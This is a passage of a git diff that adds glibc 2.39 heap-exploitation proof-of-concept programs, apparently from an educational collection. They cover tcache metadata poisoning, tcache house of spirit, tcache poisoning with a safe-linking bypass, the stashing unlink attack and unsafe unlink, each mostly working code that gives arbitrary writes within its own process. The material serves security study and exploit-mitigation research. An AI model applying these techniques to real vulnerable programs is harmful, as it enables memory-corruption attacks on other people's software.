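+    // "malloc(): unaligned tcache chunk". That is why the stack address is masked
+    // with ~0xf below before being planted on the heap.)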
+    void *value = malloc(0x28);
+    // make sure that the stored pointer ends in 0 for proper heap alignment or a fault will occur
+    *(long *)value = ((long)(goal) & ~(0xf));
+
+    printf("\t* Arbitrary value (0x%lx) written to %p\n", *(long*)value, value);
+    puts("");
+
+    // Step 3: Free the two chunks in the two t-caches to make two t-cache entries in two different caches
+    puts("Free the 0x40 and 0x20 chunks to populate the t-caches");
+
+    puts("\t- Free 0x40 chunks:");
+    // Free the allocated 0x38 chunks to populate the 0x40 t-cache
+    free(a);
+    free(b);
+    printf("\t\t> 0x40 t-cache: [%p -> %p]\n", b, a);
+
+    puts("\t- Free the 0x20 chunks");
+    // Free the allocated 0x18 chunks to populate the 0x20 t-cache
+    free(c);
+    free(d);
+    printf("\t\t> 0x20 t-cache: [%p -> %p]\n", d, c);
+    puts("");
+
+    // Step 4: Using our t-cache metadata control primitive, we will now execute the vulnerability
+    puts("Modify the 0x40 t-cache pointer to point to the heap value that holds our arbitrary value, ");
+    puts("by overwriting the LSB of the pointer for 0x40 in the t-cache metadata:");
+
+    // Calculate the address of the t-cache metadata
+    void *metadata = (void *)((long)(value) & ~(0xfff));
+
+    // Overwrite the LSB of the 0x40 t-cache chunk to point to the heap chunk containing the arbitrary value
+    *(unsigned int*)(metadata+0xa0) = (long)(metadata)+((long)(value) & (0xfff));
+
+    printf("\t\t> 0x40 t-cache: [%p -> 0x%lx]\n", value, (*(long*)value)^((long)metadata>>12));
+    puts("");
+
+    puts("Allocate once to make the protected pointer the current entry in the 0x40 bin:");
+    void *_ = malloc(0x38);
+    printf("\t\t> 0x40 t-cache: [0x%lx]\n", *(unsigned long*)(metadata+0xa0));
+    puts("");
+
+    /* VULNERABILITY */
+    puts("Point the 0x20 bin to the 0x40 bin in the t-cache metadata, containing the newly safe-linked value:");
+    *(unsigned int*)(metadata+0x90) = (long)(metadata)+0xa0;
+    printf("\t\t> 0x20 t-cache: [0x%lx -> 0x%lx]\n", (long)(metadata)+0xa0, *(long*)value);
+    puts("");
+    /* VULNERABILITY */
+
+    // Step 5: Allocate twice to reach the arbitrary value
+    puts("Allocate twice to gain a pointer to our arbitrary value");
+
+    _ = malloc(0x18);
+    printf("\t\t> First 0x20 allocation: %p\n", _);
+
+    char *vuln = malloc(0x18);
+    printf("\t\t> Second 0x20 allocation: %p\n", vuln);
+    puts("");
+
+    // Step 6: Overwrite the goal string and verify it has been changed
+    strcpy(vuln, "XXXXXXXXXXX HIJACKED!");
+
+    printf("String now contains: %s\n", goal);
+    assert(strcmp(goal, "Replace me!") != 0);
+}
diff --git a/glibc_2.39/sysmalloc_int_free.c b/glibc_2.39/sysmalloc_int_free.c
index f6810f7..b1974a2 100644
--- a/glibc_2.39/sysmalloc_int_free.c
+++ b/glibc_2.39/sysmalloc_int_free.c
@@ -10,7 +10,7 @@
 #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86
 
-#define MALLOC_ALIGN 0x10L
+#define MALLOC_ALIGN (SIZE_SZ*2)
 #define MALLOC_MASK (-MALLOC_ALIGN)
 
 #define PAGESIZE sysconf(_SC_PAGESIZE)
@@ -27,6 +27,7 @@
 
 /**
  * Tested on:
+ * + GLIBC 2.23 (x86_64, x86 & aarch64)
  * + GLIBC 2.39 (x86_64, x86 & aarch64)
  * + GLIBC 2.34 (x86_64, x86 & aarch64)
  * + GLIBC 2.31 (x86_64, x86 & aarch64)
diff --git a/glibc_2.39/tcache_house_of_spirit.c b/glibc_2.39/tcache_house_of_spirit.c
new file mode 100644
index 0000000..3765af3
--- /dev/null
+++ b/glibc_2.39/tcache_house_of_spirit.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+int main()
+{
+    setbuf(stdout, NULL);
+
+    printf("This file demonstrates the house of spirit attack on tcache.\n");
+    printf("It works in a similar way to the original house of spirit but you don't need to create a fake chunk after the fake chunk that will be freed.\n");
+    printf("You can see in malloc.c, in the function _int_free, that tcache_put is called without checking if the next chunk's size and prev_inuse are sane.\n");
+    printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
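+
+    // Roughly what happens in _int_free for a tcache-sized chunk (paraphrased, not
+    // verbatim glibc code): the chunk is stashed before any next-chunk sanity checks run.
+    //
+    //   size_t tc_idx = csize2tidx (size);
+    //   if (tcache != NULL && tc_idx < mp_.tcache_bins
+    //       && tcache->counts[tc_idx] < mp_.tcache_count)
+    //     {
+    //       tcache_put (p, tc_idx);
+    //       return;
+    //     }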
+
+    printf("Ok. Let's start with the example!\n\n");
+
+
+    printf("Calling malloc() once so that it sets up its memory.\n");
+    malloc(1);
+
+    printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
+    unsigned long long *a; //pointer that will be overwritten
+    unsigned long long fake_chunks[10]; //fake chunk region
+
+    printf("This region contains one fake chunk. Its size field is placed at %p\n", &fake_chunks[1]);
+
+    printf("This chunk's size has to fall into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
+    printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.\n");
+    fake_chunks[1] = 0x40; // this is the size
+
+
+    printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
+    printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
+
+    a = &fake_chunks[2];
+
+    printf("Freeing the overwritten pointer.\n");
+    free(a);
+
+    printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
+    void *b = malloc(0x30);
+    printf("malloc(0x30): %p\n", b);
+
+    assert((long)b == (long)&fake_chunks[2]);
+}
diff --git a/glibc_2.39/tcache_poisoning.c b/glibc_2.39/tcache_poisoning.c
new file mode 100644
index 0000000..d3f6bb9
--- /dev/null
+++ b/glibc_2.39/tcache_poisoning.c
@@ -0,0 +1,63 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <assert.h>
+
+int main()
+{
+    // disable buffering
+    setbuf(stdin, NULL);
+    setbuf(stdout, NULL);
+
+    printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
+           "returning a pointer to an arbitrary location (in this case, the stack).\n"
+           "The attack is very similar to the fastbin corruption attack.\n");
+    printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
+           "we have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
+    printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n"
+           "a heap address leak is needed to perform tcache poisoning.\n"
+           "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n");
+
+    size_t stack_var[0x10];
+    size_t *target = NULL;
+
+    // choose a properly aligned target address
+    for(int i=0; i<0x10; i++) {
+        if(((long)&stack_var[i] & 0xf) == 0) {
+            target = &stack_var[i];
+            break;
+        }
+    }
+    assert(target != NULL);
+
+    printf("The address we want malloc() to return is %p.\n", target);
+
+    printf("Allocating 2 buffers.\n");
+    intptr_t *a = malloc(128);
+    printf("malloc(128): %p\n", a);
+    intptr_t *b = malloc(128);
+    printf("malloc(128): %p\n", b);
+
+    printf("Freeing the buffers...\n");
+    free(a);
+    free(b);
+
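+    // With safe-linking (glibc 2.32+), b's "next" field does not hold a raw pointer:
+    // it holds PROTECT_PTR(&b->next, a), i.e. roughly ((size_t) b >> 12) ^ (size_t) a.
+    // So to make it decode to `target`, we must store ((size_t) b >> 12) ^ (size_t) target,
+    // which is why a heap leak (the value of b) is required for this attack.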
+    printf("Now the tcache list has [ %p -> %p ].\n", b, a);
+    printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
+           "to point to the location to control (%p).\n", sizeof(intptr_t), b, target);
+    // VULNERABILITY
+    // the following operation assumes the address of b is known, which requires a heap leak
+    b[0] = (intptr_t)((long)target ^ ((long)b >> 12));
+    // VULNERABILITY
+    printf("Now the tcache list has [ %p -> %p ].\n", b, target);
+
+    printf("1st malloc(128): %p\n", malloc(128));
+    printf("Now the tcache list has [ %p ].\n", target);
+
+    intptr_t *c = malloc(128);
+    printf("2nd malloc(128): %p\n", c);
+    printf("We got control\n");
+
+    assert((long)target == (long)c);
+    return 0;
+}
diff --git a/glibc_2.39/tcache_stashing_unlink_attack.c b/glibc_2.39/tcache_stashing_unlink_attack.c
new file mode 100644
index 0000000..bbec3ab
--- /dev/null
+++ b/glibc_2.39/tcache_stashing_unlink_attack.c
@@ -0,0 +1,80 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+int main(){
+    unsigned long stack_var[0x10] = {0};
+    unsigned long *chunk_lis[0x10] = {0};
+    unsigned long *target;
+
+    setbuf(stdout, NULL);
+
+    printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
+    printf("This poc has been tested on glibc-2.27, glibc-2.29 and glibc-2.31.\n\n");
+    printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last but not least, we need a writable address to bypass a check in glibc.\n\n");
+    printf("The mechanism of putting smallbin chunks into the tcache in glibc gives us a chance to launch the attack.\n\n");
+    printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
+
+    // stack_var emulates the fake_chunk we want to alloc to
+    printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
+    printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10), which is stack_var[4], will be a libc addr after the attack.\n\n");
+
+    stack_var[3] = (unsigned long)(&stack_var[2]);
+
+    printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
+    printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
+    printf("Now we alloc 9 chunks with malloc.\n\n");
+
+    //now we malloc 9 chunks
+    for(int i = 0;i < 9;i++){
+        chunk_lis[i] = (unsigned long*)malloc(0x90);
+    }
+
+    //put 7 chunks into tcache
+    printf("Then we free 7 of them in order to put them into the tcache. Note that we didn't free a consecutive series of chunks (like chunk2 to chunk9), because two adjacent chunks in the unsorted bin would be merged into one after another malloc.\n\n");
+
+    for(int i = 3;i < 9;i++){
+        free(chunk_lis[i]);
+    }
+
+    printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into the unsorted bin.\n\n");
+
+    //last tcache bin
+    free(chunk_lis[1]);
+    //now they are put into unsorted bin
+    free(chunk_lis[0]);
+    free(chunk_lis[2]);
+
+    //convert into small bin
+    printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into the small bin.\n\n");
+
+    malloc(0xa0); // size > 0x90
+
+    //now 5 tcache bins
+    printf("Then we malloc two chunks to make room in the tcache for the small bin chunks. After that, we now have 5 chunks in the tcache bin and 2 chunks in the small bin.\n\n");
+
+    malloc(0x90);
+    malloc(0x90);
+
+    printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into the fake_chunk addr: %p.\n\n",(void*)stack_var);
+
+    //change victim->bck
+    /*VULNERABILITY*/
+    chunk_lis[2][1] = (unsigned long)stack_var;
+    /*VULNERABILITY*/
+
+    //trigger the attack
+    printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin chunk previously freed will be returned to the user; the other one and the fake_chunk will be linked into the tcache bin.\n\n");
+
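+    // Roughly what the calloc below triggers in _int_malloc's smallbin path
+    // (paraphrased, not verbatim glibc code): after returning the first smallbin
+    // chunk, the remaining ones are "stashed" into the tcache with no fd/bk check:
+    //
+    //   while (tcache->counts[tc_idx] < mp_.tcache_count
+    //          && (tc_victim = last (bin)) != bin)
+    //     {
+    //       bck = tc_victim->bk;
+    //       bin->bk = bck;
+    //       bck->fd = bin;          // <-- writes a libc address through our fake bk
+    //       tcache_put (tc_victim, tc_idx);
+    //     }
+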
+    calloc(1,0x90);
+
+    printf("Now our fake chunk has been put into the tcache bin[0xa0] list. Its fd pointer now points to the next free chunk: %p, and bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
+
+    //malloc and return our fake chunk on stack
+    target = malloc(0x90);
+
+    printf("As you can see, the next malloc(0x90) returned the region of our fake chunk: %p\n",(void*)target);
+
+    assert(target == &stack_var[2]);
+    return 0;
+}
diff --git a/glibc_2.39/unsafe_unlink.c b/glibc_2.39/unsafe_unlink.c
new file mode 100644
index 0000000..bdcb739
--- /dev/null
+++ b/glibc_2.39/unsafe_unlink.c
@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <assert.h>
+
+uint64_t *chunk0_ptr;
+
+int main()
+{
+    setbuf(stdout, NULL);
+    printf("Welcome to unsafe unlink 2.0!\n");
+    printf("Tested in Ubuntu 20.04 64bit.\n");
+    printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
+    printf("The most common scenario is a vulnerable buffer that can be overflowed and has a global pointer.\n");
+
+    int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin
+    int header_size = 2;
+
+    printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
+
+    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
+    uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1
+    printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
+    printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
+
+    printf("We create a fake chunk inside chunk0.\n");
+    printf("We set up the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\n");
+    chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;
+    printf("We set up the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
+    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
+    printf("We set up the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
+    printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
+    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
+    printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
+    printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
+
+    printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
+    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
+    printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
+    printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly.\n");
+    chunk1_hdr[0] = malloc_size;
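+    // What the upcoming free(chunk1_ptr) will do with our fake chunk P (a sketch of
+    // the classic unlink writes, not verbatim glibc code):
+    //   FD = P->fd;  BK = P->bk;
+    //   FD->bk = BK; BK->fd = FD;
+    // With fd = &chunk0_ptr - 0x18 and bk = &chunk0_ptr - 0x10, both writes land on
+    // chunk0_ptr itself, leaving it pointing at &chunk0_ptr - 0x18.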
+    printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
+    printf("We mark our fake chunk as free by setting the 'previous_in_use' bit of chunk1 to False.\n\n");
+    chunk1_hdr[1] &= ~1;
+
+    printf("Now we free chunk1 so that backward consolidation will unlink our fake chunk, overwriting chunk0_ptr.\n");
+    printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
+    free(chunk1_ptr);
+
+    printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
+    char victim_string[8];
+    strcpy(victim_string,"Hello!~");
+    chunk0_ptr[3] = (uint64_t) victim_string;
+
+    printf("chunk0_ptr is now pointing where we want; we use it to overwrite our victim string.\n");
+    printf("Original value: %s\n",victim_string);
+    chunk0_ptr[0] = 0x4141414142424242LL;
+    printf("New Value: %s\n",victim_string);
+
+    // sanity check
+    assert(*(long *)victim_string == 0x4141414142424242L);
+}